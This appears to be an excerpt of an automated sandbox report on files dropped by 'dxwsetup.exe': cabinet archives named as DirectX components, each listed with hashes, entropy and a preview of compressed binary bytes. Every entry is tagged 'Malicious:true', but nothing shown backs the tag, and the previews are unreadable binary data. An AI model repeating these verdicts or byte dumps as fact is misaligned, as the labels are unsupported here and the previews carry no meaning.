                                                                                              SSDEEP:3072:kF/u2w4VarOr9vE3eKgpEUcXDlkCAMsukGtnJW+ATOcfKy:kF/JWg9vE3eKzXDeMpNnUOcfKy
                                                                                              MD5:082B7D69F96799AA2AB1A8EA1FA2AB88
                                                                                              SHA1:75C7032B749259977C947A5103F9A4B92C2025DE
                                                                                              SHA-256:B98E55C654B9EE6F6D040665D932BEA7A1299C56CC9996EEA900AC4F5649C7D3
                                                                                              SHA-512:57C96A4C99AB9A7D33A8CC81A3B4E2AB58FE3A2FBC7F79AD688C7D0257D281C662D4CE0737F68C00D15F715BC6177D2FF9CC32A69CFB77216265FA56FF79DD8A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....w!......D...........................w!...#..................! .........5.a .xact2_5_x86.cat..;..! ....o5.\ .x3daudio1_1.dll.....9[.....5@` .xactengine2_5.dll.W...Q2.....5.` .dec2006_xact_x86.inf......8.....5.` .xact2_5_x86.inf.@.u..;..CK.|.\S.........EY...E.......A..M..dk.P\.DT..V..Rq..R.*.(..V.[m........E....}...}.......{g..9g.9....x!.ZGo....o.)..B...........a8.....^H....C.S.].)e....U.,.}..E...a7..+.......xv.>..H......N.Sp#-t*.J...)...c0'....1w... ..9c8..8.~NP........O7(.b....%.u...T..-.....9*.;........H...~c 7.n>.A9.........W....#..@..p!.G.R1\....B.N.'..Z.c|0..(+.l...<._(6..cYX:&.$p.F?.VK.t.....[|,....q.b.....AS6...h.I.G....1 ...z.....J.j.~..-.H...@.z>.. M...{.".........o7...-....E..C..6..................`...... m)..ad.#.5...p.....j..j|..w...#.j]..BZ.......?oK...=_L.bDD..{.VK^...qe.../x.5.,h....1.".l,.x...N..)..N.A............%.H.k.Dv.4Kd......,..f...lB.QO6.N.(`..D..<W+......j....d....{o..t...e4*.Je.=.w.....773....q...Ha@.*..Q..I.1.N....4
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1241539 bytes, 4 files, at 0x44 +A "d3dx9_24_x64.cat" +A "d3dx9_24.dll", flags 0x4, ID 4731, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1250707
                                                                                              Entropy (8bit):7.999567218170613
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:bsacaEhnsKcwXWOBfH7OhvlY2HIbbK09zRy2/TnN75EEvIOiOhpbF:xuzcwXW6YlFIbtN7MOiOh
                                                                                              MD5:DCA673A8F9F834F9370862D1C97FD9E7
                                                                                              SHA1:1A0CF0FDDA2C9E8ABDF5CC19FCDBEAF1BC1639E7
                                                                                              SHA-256:BE3DE63F136A2B41D3229E477CE2CD7F67DED031B4B370E640C39B80368238CF
                                                                                              SHA-512:255270BDBC1DCD6A3213D8F0DA2E48C6445B0141C5148EDD1DABC9CA4643667651694B68013412A4F2EC90CCD60A757F64A9A76E2576C4FCB056DDE726A6F67B
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............{................#..............o...7.........E2.. .d3dx9_24_x64.cat...6.7.....E2.. .d3dx9_24.dll......26...E2h. .infinst.exe.......7...92.. .d3dx9_24_x64.inf. ..nl9..[.... Wnq..@..$Q.P...>.$..B;.*.......R...te.....K+.E...E%.....Zk...AQ.....8....C........h...:'iI....5B.'.:}..Y{-.H.6.*.......b...$.P........'..*..i.....H..i"8..$..........!"..."I.n6.Me6...Z..F)..P.^P..P.W.~........&V...q..~..'.AE.!...."...(.$.eP.HD..5................k..Ky%.>.kS....l.)...uN.-.$S.."......I@...bh./V.).A.....+.].....'.]....q.>.Uo...."..g...U.(...qXq.pH.L... ...."V.....Q.R....'>\...9.s............8....]gON..`a..S..u.O%.e.....U...H..CCr`.n...7=}...|z..3...k......CH.^.#..../.....c.rM_.`............"...y#.....YW...<..%CZ...=.c....ni......8.^....G.V.J8..". .?@.+R..'...m.7...JX...q....p.......:....zs..@.....9..w.Q......3+.......wt...G.\..V..8......B.=+.,#..l.Z..R.....F.=8.....#p..'......>.q.h...E.ME.^ig......./......".GB.O..Q...i.-r. .......
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1007265 bytes, 4 files, at 0x44 +A "d3dx9_24_x86.cat" +A "d3dx9_24.dll", flags 0x4, ID 4987, number 1, extra bytes 20 in head, 69 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1016433
                                                                                              Entropy (8bit):7.998972724711677
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:T/HUK+hlSM4jwe8WpmQUrxiUyULWoF/V++TYrjVdLa1:bHURewe8W4VN8uF/VhMr5s1
                                                                                              MD5:7029866BA46EC477449510BEEE74F473
                                                                                              SHA1:D2F2C21EAB1C277C930A0D2839903ECC55A9B3E8
                                                                                              SHA-256:3D4E48874BDDCD739CF79BF2B3FD195D7C3E861F738DC2EAB19F347545F83068
                                                                                              SHA-512:B8D709775C8D7CA246D0E52FF33017EE9A718B6C97C008181CD0C43DB7E60023D30D2F99A4930EBA124AF2F80452CBF27836D5B87E2968FB0F594ECA1EBF78DD
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....^......D...............{............^...#..............E...7.........E2.. .d3dx9_24_x86.cat...!.7.....E2.. .d3dx9_24.dll......."...92.. .d3dx9_24_w9x.inf......."...92.. .d3dx9_24_x86.inf.(~m.?..CK..\.Y..O..........H.$@..(M..X.. R.I...6...#.^.......{w..}&............{.3..gf.e.....0*`..kFm.......i.`p....X..Y-..7]n^..9...e.(.7..^..V.FO+...v.,e.^..l(i~w...M...l...s...z..U.7.c5.b.3..........#1.I.'.F2.C.@.......'Hx /..K.~.`g.).0..".8y....0.8...N.|..v.u@...P...H.R......c;W....yg..x....s...2..\...}..%21.D..... ...q.....E,.....q.Ee..$...66...pGr}.. +..!&&&PK..f.r...x.'..<.. ....kH..@....~l....\....@fD...+y..:UC.%...zy1.........~j..v..{%..v[S.ZEE...5....i;..1.(...&.x._.......R+[A..l..z(.e. .k..jbf.@.336T.[...'...J/-..uHc.u.....6..U.....).l...&.".9.X..H\.N...d.V.g...^...Jv..PQ~#?....V.......j:..p.....k.R.......0o.~..F..70.).4b7......+.:.&.)Qd(9...i....J35q.....T%..b._....,..........)Qjt.DU.B.R.s..-.`.......4HE...JObJDlG.4x......lb..<..C..sHD.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1356836 bytes, 5 files, at 0x44 +A "d3dx9_29_x64.cat" +A "d3dx9_29.dll", flags 0x4, ID 6656, number 1, extra bytes 20 in head, 120 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1366004
                                                                                              Entropy (8bit):7.99967777757325
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:Qllh+6W44yAAf47xvIWTTbTpHe3Agqqvx3C86vBOZw1b4oWU+vz3zJvxfIc:Qh4DhlgWRHeQgtvx3FABOCth8vzN7
                                                                                              MD5:33618039DAC4E97C813E5BC1A499E6C6
                                                                                              SHA1:C792B9D0134DF698476C2FA4179DE6BCE8AA583B
                                                                                              SHA-256:A5FFAF9D58DA5D79402C4DC93E79960F971D2701D4651BB33D18925AF641F11D
                                                                                              SHA-512:35B490903721CA5FAEF73815D4F9C6F52EFAB1FE82A4FDBD7566A1B028525AFD29A72DC68D4B7D219CFA5CB33FEC241D6B2784F15F9795D368DC356B3DF30B5D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....$.......D...........................$....#..............x.............C4.F .d3dx9_29_x64.cat..t:.......C4nE .d3dx9_29.dll......:...C45E .infinst.exe.......;...C4iF .d3dx9_29_x64.inf.&...2.;...C4iF .feb2006_d3dx9_29_x64.inf.l..3.9..[.... .q..@..$Q.P...>..$....)......2.k..LJ.].-.K+.E-h.k/Z.....Z..=....... b..=.o...........$.h...bT'7f.Q..2..;.o...M<C.u....xx..%..Z><..!_&'.Xq1E.Q...Q..[vP...d.I...........".(n(.....n.M....XA..J..C. ...c\*.....<......w.r..I.m..FM#....f..tdbdPR..Si:.:BQ...."..-.%...1U%.."Y..B.%.xF&S.V.<.).......6.^...D.(.eI.`.".p..?b..';.$..X.......H...$+...E....:_.b.(.0JF..E.w_..,..+.....$....+..AMBP..f.5..'....3 n.|...B ...0....t,.j.N..v}...WG.L.]..l....Q5..5..B.....X...^....U.~.x...%.....&wG/.5t.........T..G>.YjJ.].[..M^O......;.,.....]...1..__.K)sy...?.s.%.u.....a...!~..8.......F.^.%)N..c.J#....).`-.lz.T]..._..{..4...z?..p...H..%9)....y2.......S.{..h.K.....toRgh......D.V..%.?.|.?V.Vr1.......Jd..zz..C(.'...,.!.X.-..o....O...V!"..8..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1078760 bytes, 5 files, at 0x44 +A "d3dx9_29_x86.cat" +A "d3dx9_29.dll", flags 0x4, ID 6921, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1087928
                                                                                              Entropy (8bit):7.99922866964108
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:MWlF24ngnZPhX4ciAwvVHgK6SgHY6OmSfLV+:MWls4gnZTmHx6SgnPCY
                                                                                              MD5:F6CC1C08D0F569B5F59108D39CE3508B
                                                                                              SHA1:E9CF7EDC8C9C4B57A9BADD8386A2117EC5785AAB
                                                                                              SHA-256:4114E76799AF3DA9DB3DAE51305DAD70A05B757E506E4A327092D536CCA7EE75
                                                                                              SHA-512:86DF72D5B15396ACB504C1AC9DE7FF5C0CC9C95A90FDD82DAEDC55BAAD490CC47A71CB511571D37E25DD9BC1EE9652B9723E33879BC1756A7881A8E61EBC59ED
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....u......D............................u...#..............H.............C4.F .d3dx9_29_x86.cat..#.......C4hE .d3dx9_29.dll......#...C4hF .d3dx9_29_w9x.inf.....x.#...C4hF .d3dx9_29_x86.inf.......#...C4iF .feb2006_d3dx9_29_x86.inf.w.6..>..CK..X.[...C.Q...1XQ.N..........T,..D .$....c.]......#..{.z..]..E....}...?......f.=..=.g.....v..]F.Y3j...8...&....V..S=S.f...1]aQ......a...1..Q...V.....m..e........s..m.[c.....yl.{/.^%q.Z.I ..hg..DH..........$..........AB.....!N.w=!F.g. .s.p.B...X...LL..X.c ....z.B...........b.81...>:/b..*.....511A..[.&.3vo.'.V)..kgjb...\..|..!(.i..%#...8..9U*m..]_.E...c.o.{....|j..r4..CN..2....K..].t.E..CH.2b}I.A_.D...5s.e....K..&..*.n.K....a..p.$29...o.HN..[..k...d......1V.....P..9..e.....p9...c=..RQ .7.H61.e ......I~.v.....p}:.1.:r.i....qb..@K.......AM.(.QM....%.p....+.9....~.J~.J~.J~.....-....`.0LLl...3nL.....t.f/...x.9......n....I/!.!V..X........S,OU..`.tt..u$i...*]...`.6...o..(..).-..tD.....L.B.S.+c.:.Z.n......od<..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 172399 bytes, 6 files, at 0x44 +A "xact_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8042, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):181567
                                                                                              Entropy (8bit):7.99567918868168
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:d0F/biJLp9lt7vCmPW8+bobje8bRuaUDuHxiViqmFT8K9rz3a9cO2A2XSHao4svF:KqvlhXu8++q2WuHYrS8ky2A2XKJvub/I
                                                                                              MD5:582102046D298E7B439C819895F6061D
                                                                                              SHA1:09900F44668350118589F18C693B131D7C1F9238
                                                                                              SHA-256:C91A6380C65853E41E2F9593B954F3B5AF49BCC894476D8EB78CD9F8B6DD7DA4
                                                                                              SHA-512:8AABBCBC88489FF8828D532BE5C1BC0D33D7960F41C7B38348AAE73BA4777999F4358466D061DDD8291DBD434E7741EE2C3215A10F8287BE36209E0842C4EB2D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....o.......D...............j...........o....#..................! ........C4.F .xact_x64.cat..@..! ....C4)E .x3daudio1_0.dll..l...`....C4OE .xactengine2_0.dll...........C45E .infinst.exe.z.........C4jF .feb2006_xact_x64.inf...........C4jF .xact_x64.inf.....&9..[.........R.P...O....5p.R...1.!..).a. G7...QJ.........%.G*$...Q.....D..h....v.....f.........q.lv...7.(s@.1.;i..R..7....9+.t<.F.1.84.D...{........f.......iYFdP.Dc.xG.. .0...;...B/IN..x/.w.b..]I... .WAJ.......6....J.8..@.....r.s..NV.#..D.+.c.Y....WQ....'..)`..,.BR.8+I..@....L.9.......8......y...0.u.@...R.../..W.#F...Y].K..C.....t.<E....B... K...A.....<....2.@......f.....`...@x.'..Y.Ab.G]a..X..2.......B.Z.i.../.z...+F.....w..:.+t......e...y.=.a......z.} ..(.{............~|....._Ai=..m.7..s.%...C.H.m.I..PA..O.$..g..PG.2.....5.\...P0.....z.a..#..?m....%.B...T.......v.u..E....3t...G.^......Q..+0..Q...t.....J...!......Y..+....y.w.".Z.@............P`......G....$t..W.'.?....H.^z~./...p..V..I..X...$p..^...
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 126449 bytes, 5 files, at 0x44 +A "xact_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 6923, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):135617
                                                                                              Entropy (8bit):7.992141777548868
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:EaLgbEzMsJxjJDOAfpPt4HvbVs/m2EKtaVNRF+kA5Y0L5XP/JwObYeM57H:LkgzfxjUWL/3EKtqNlGYeXqObkL
                                                                                              MD5:FEC720C0C15C43569EA9FAB7CEAFEA95
                                                                                              SHA1:C65235B40865725A00675F1BC013BA8B77307669
                                                                                              SHA-256:6456FC26622F3A72B9449ED0E61874CF1ADBA23CCCBFCDA1324F033FE0788FDA
                                                                                              SHA-512:8EDEE940930E3C610E709E2C6348ABAB479628BFAC71A0C507F46AF8D80F1F0C6E31C7C44AF5F884668CE472B281FF18CB44A97AB68232D455B7BC8F89A75268
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! ........C4.F .xact_x86.cat..6..! ....C4-E .x3daudio1_0.dll.....V....C4CE .xactengine2_0.dll.3.........C4iF .feb2006_xact_x86.inf...........C4iF .xact_x86.inf......8..CK.|.\....l...X.".....Y2..ET.$..dd.$.........'...*....1..|;.b....=D0._.........{....twuUuuuUMw.-..1RR...{.;u.2.0... U*..U.U....4....s.7.T.(tJ..*.0.^..S8KIU.dQ(tvCdL...'G........{..%n...r.&....T....P...m0.....1{x.a..;.<0+..0[..0..8.x.'.<...r.Pv.Z..l...p.0..f..G.n.J.N...}.9@i...07..V....:.....8.'[...p(u....%...~.T*...R....D.Z.....Q....m.Y......1...%bq..ng..M..M.8....\/....D....M...A.+...zaK...$.8...d.%u....&5..9.....k(#=9@.._..3Nm..M.7......s...f'....... .')..).N....=..!.....HrDg..6.t.z..KxT.^....0.H..P.....[..Vv..jg.:."p.........a.A$.` ..'..0.....dgAw.qCc.,.K.|@.t...t6....8t...m.[..Hl7..K...[.m#.Z....~.%{a.6..t`...z....F... ..u..yK..,y.V!o...W.;.y.t.k.D..p./.Q)T*{..>.k...<.=H.V....c#...*[LFEZ0]I.:.....S...'..%s<.R.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 188715 bytes, 6 files, at 0x44 +A "xact2_6_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8448, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):197883
                                                                                              Entropy (8bit):7.995921670109717
                                                                                              Encrypted:true
                                                                                              SSDEEP:6144:aX7CLQxFiIUEWXDCsi3jGg+U2p2z51zHdZ5a:78iE1sx0s
                                                                                              MD5:CC622A75240CA96FA8F28BD984BED5BC
                                                                                              SHA1:424F216C5C0E02AE654612EAEB04900C9DAFBC61
                                                                                              SHA-256:3454D5101716A5C17BCDEE8632668D981F99E8558D8D05E20A33ED718ED8C2AC
                                                                                              SHA-512:EAB36CD6BC3AE6F67D89996785F9C7D51E140BFB839A866B4E4FFA7809846DF861D30D1FCE2E1A498E8403DECA5CCBC50B8F37F4C1B4AD3CD3A63B150C49ECEF
                                                                                              Malicious:true
                                                                                              Preview:MSCF....+.......D................!..........+....#...................)........86v| .xact2_6_x64.cat..E...)....(6.{ .x3daudio1_1.dll.h....n....86w{ .xactengine2_6.dll.h...&p....869{ .infinst.exe...........86.{ .feb2007_xact_x64.inf...........86.{ .xact2_6_x64.inf.{4&.Z=..[.....0...R.P...>..s*.N{.....9..J<.....AZ.Q.PQT9'..E.I....R..(.T$..........w?.Z....Q.b......!-...&..2Un ...TCY.t(.07#..I. ..... 8...".7.... P.....F......-q..Y+."-/....}W.].......l2..]T.H@o..t..^..@1..Yd.2f.@d..?%....B.H.r.P....l$..d.3w....J...%^..!.Q..q...$...C."...t....LO....=...E..'.Pw@!...>...`...v..|Z>.?Sv~.Eb=........R.../.....A....h.....Q|.w.e.e;..h..7.P......}.?R]... ...=.."`...F.t}>0...>.../`!...>..8......W.+.a....!@.`d.....p.b.!}..4..ma%..<..+8.%X.....u....v...C.;iW...0.}"....h...|*/r......c_...Y.p.F(G..N......o..#....P........).(........+.;...O...iOK.,.........A.x.k.....~..l....@.$z.D....C=b....S..}.+....7... .~...n..%XM...c_.'..B........\.....0..?.7...m7~......n@..Q...Y......._.f
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 142023 bytes, 5 files, at 0x44 +A "xact2_6_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7329, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):151191
                                                                                              Entropy (8bit):7.993972565562067
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:4uMWvVgAanBDv9WkUtrr/uZfQMyolbnXkFDwoY0ZwuY:BVgAutNUtrLuZfjjljgTY0JY
                                                                                              MD5:A09F7EAB35816D682E7432DBB36B047D
                                                                                              SHA1:DB67B9434ABAA8E7F166956A1C8D01F536162C21
                                                                                              SHA-256:0E3655490667DDF17150AEC089889268BDD7F1E8367D2BED6F3EB68A5FF28288
                                                                                              SHA-512:FB1CDBFB3CDD60783D1C8696EA6EFB746331880C79AA74052808CA09092CF1A2336BF784104D16203740998129B718DC0AD4A632E4031E85CCF340C593F05E57
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1330042 bytes, 5 files, at 0x44 +A "d3dx9_26_x64.cat" +A "d3dx9_26.dll", flags 0x4, ID 6675, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1339234
                                                                                              Entropy (8bit):7.999619123900207
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:acfUVHkSDmhcG/IQtmLMLfNYIpTTHh0am4l76wbh:XUBvDzfQtCMLfNYqXqal75l
                                                                                              MD5:05103E47F259FA22D27C871E4CDEE7D9
                                                                                              SHA1:502FA5D15FE56DCF64431BB7437E723137284899
                                                                                              SHA-256:794E23D8B08F88BB0D339825B3628C24CD0297195657F9871EE6324786FADA36
                                                                                              SHA-512:180E0ABBD97B6781C6639C6AB2A2355400B8E32784A8469C3CBEDEA23B121CAC5BA17F6AA509610D0A1E5830735455690F574054D6224A6A5D2AE70EDB601835
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1058965 bytes, 5 files, at 0x44 +A "d3dx9_26_x86.cat" +A "d3dx9_26.dll", flags 0x4, ID 6937, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1068133
                                                                                              Entropy (8bit):7.999040217820951
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:NxFMsUF1MmwONoWu85w6SFBu+vveJ0sut3z2A1s9z/D8gigA:V3dm3NoW+9FBhuJ9ut36A1s9z78giP
                                                                                              MD5:029359EBCA4BA5945282E0C021B26102
                                                                                              SHA1:6107919F51E1B952CA600F832A6F86CBBED064B5
                                                                                              SHA-256:C44EABF5BE3B87CD845950670C27F6A1E5D92B7758BA7C39C7849B1EE1C649C0
                                                                                              SHA-512:FA007F257F5267119B247EC4ED368E51FD73E6AEA3097E2FC4E78078C063AF34D161FD1BDCAF3097BB575D2614DBA226A624D060009EE4F7BEDA697EFCF42BB7
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 174825 bytes, 6 files, at 0x44 +A "xact2_2_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8466, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):183993
                                                                                              Entropy (8bit):7.996017590596314
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:fC8YuRPaoTUX/SmAwGUGY+geIhVhbjF/kZ8FyQU02JhzqhA7J4rMgThmwQvzb7e:fCoJaoT8/2Z9YA+VhbR8Zwy3RimwQvzm
                                                                                              MD5:D404CCED69740A65A3051766A37D0885
                                                                                              SHA1:288818F41DA8AB694C846961294EE03D52AEA90D
                                                                                              SHA-256:5163AFA067FE2F076AB428DD368BA0A2CF6470457BA528A35E97BE40737A03C0
                                                                                              SHA-512:87998E67B359C2A0D4F05DC102F6C4DB4F260903385B7558A2C1A71436001D5B18F42B984E6B279A8197243593C385D41F51DE630FA31C5CA5140F6970F87657
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 127711 bytes, 5 files, at 0x44 +A "xact2_2_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7347, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):136903
                                                                                              Entropy (8bit):7.992894428315885
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:D12mlhVvEbdSlFHljhuz+iFmKtp5LW+pc7Y5EExt2KF3:DwkMhqjhuz+efdLy7YSEP2KF3
                                                                                              MD5:CFCCA19D60EC3D822ED5EC8BBADEC941
                                                                                              SHA1:AB0E87182877991810AF48F1478906C1E671829E
                                                                                              SHA-256:23495764ABA10FF35CF9D23AEEFFDF38716219D8A155AE29162F01F7FE6A30CF
                                                                                              SHA-512:2ACAEA2DE2D77BBE8206E8309D48A4CBA432D72FB9BDE2576BCE7A31EE29FDCB0D44C2B996E8DC21A31BCDB03C806E11AD53B74D9C4C972436D5202825900C01
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 693084 bytes, 7 files, at 0x44 +A "d3dx10_34_x64.cat" +A "d3dcompiler_34.dll", flags 0x4, ID 10180, number 1, extra bytes 20 in head, 61 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):702252
                                                                                              Entropy (8bit):7.999542751209748
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:8B7y3n2GQi70ZEqAEToKVkDYK96luRC/Qwrkxb0b9fhXNkVkN2t3r1:8BO/j0ZWET/isK96luRC/jk49JN2t71
                                                                                              MD5:1AB35D11274D1ADBD316B19C44B9AE41
                                                                                              SHA1:14165EC367CE179588C8A5806FC968FDB49B4ACA
                                                                                              SHA-256:02ED1B5A850EDB52EC174DE177E91842EDC7C5F4C06CEDA5B16F3427DBCD4C99
                                                                                              SHA-512:71C8FAC7C95211D323C4FB6A02916E7D43EE399BBE0F1D983B5AC210F5039B23355F40B36F023F3C36E19787E2871A60CC389E51D6327652CD84D9E3B93D5A4D
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 692512 bytes, 6 files, at 0x44 +A "d3dx10_34_x86.cat" +A "d3dcompiler_34.dll", flags 0x4, ID 9065, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):701680
                                                                                              Entropy (8bit):7.9989902264021255
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:SuBBWP1krfKO0BZwB6ux8hBXsRbD3RazqgwLdJPMqHy7qdXCyhUW3zE:DBTrZ0BZwV8fXsprRaxsDBHyWdXg5
                                                                                              MD5:19383CBADA5DF3662303271CC9882314
                                                                                              SHA1:123C97C33F7EF2BA345B220450F181D440412E6B
                                                                                              SHA-256:8EC971C91040618338AC2369188F3E5D7C85A5B1E3B9FC8E752DD845D295CDBA
                                                                                              SHA-512:A4C6ACC9FF656E05D75AE0081C65C200B584209C99FD001494C4D206F2CE8A78D2DD3644E51018574928F3B9E9373BF7EC8C5147A3590B54D1C6D50E61342853
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601814 bytes, 6 files, at 0x44 +A "d3dx9_34_x64.cat" +A "d3dx9_34.dll", flags 0x4, ID 8310, number 1, extra bytes 20 in head, 140 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1611006
                                                                                              Entropy (8bit):7.999795394912666
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:dyO6V3G0SAcId5iPNJKbtZJSlR3Q0872iOda:dyDlSA/5iPNY7Jo3GPOda
                                                                                              MD5:8DBAA3047397EE4CFCA2EFFFCC2DFBD1
                                                                                              SHA1:D88FAD72D7EAF38B8469B2B8492311C39C42BE04
                                                                                              SHA-256:FE4B15931E048C97CBBC26F753093E7D41ECCF174402542631284F8BDB9EE692
                                                                                              SHA-512:1CE01BF0BD4C0D832D95B13E958DA6CB69C0D3949B128FCF40EC59ECC0AD8989B27C91EAC28CD98777D57DFEB811CC1077FDB87348A11B6370D806771D7E742D
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601326 bytes, 5 files, at 0x44 +A "d3dx9_34_x86.cat" +A "d3dx9_34.dll", flags 0x4, ID 7195, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1610494
                                                                                              Entropy (8bit):7.999066428256981
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ZBdkB3TM+mIf4qyM0iJRy3QvQDxPYKhatPJZcg9QwJeYX34eq2F37kRVeLbdiL3q:ZPU3TMXxDVI3vQ2KSBP4YH4aAELbdK3q
                                                                                              MD5:FE8FEB215FAE59866DCD68C1604D97AA
                                                                                              SHA1:CEDACA678D15E78AA458B965ABB467E8964A1FAB
                                                                                              SHA-256:1C1E1C6F68BA556A0AF09A38C32EB421C543A4848C4B42D25867C98DAB3B3A50
                                                                                              SHA-512:9955336B561E4FD3BA3DA7FC086643E811048A25A7E68344D2CC5CAB091980BAAE1C04CE41328B59C896662E2875886B78EC869852B2D1DAAA46AF38C894A3F2
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 191162 bytes, 7 files, at 0x44 +A "xact2_8_x64.cat" +A "x3daudio1_2.dll", flags 0x4, ID 10131, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):200354
                                                                                              Entropy (8bit):7.996324633982409
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:Oxuwfa4lebkGyR+DPZLOYZ9lD7baC+PJEDzfYPO6quXhBhYDLk0siPnJ8WKKiu:Oja4WkNWOYxX1+++vRB200ssJ8G
                                                                                              MD5:B9648D12DF695290BE0479C1E78894C7
                                                                                              SHA1:932627D40A83411F9F4006792ADEEB4C3A74CF37
                                                                                              SHA-256:3F2CA0ACCEF2594FB014296F4111B7FBB59729C5D928B22F7283C392494FEE7C
                                                                                              SHA-512:240B622B02C5FA3D036043ECBE5BF29FEE447147AF36E795BFAE83FAFA35934FC22A3E9CC2D846BD880D7808897355E16696C555146EE69864472D4600AD25B6
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 146949 bytes, 6 files, at 0x44 +A "xact2_8_x86.cat" +A "x3daudio1_2.dll", flags 0x4, ID 9016, number 1, extra bytes 20 in head, 10 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):156117
                                                                                              Entropy (8bit):7.994909703055095
                                                                                              Encrypted:true
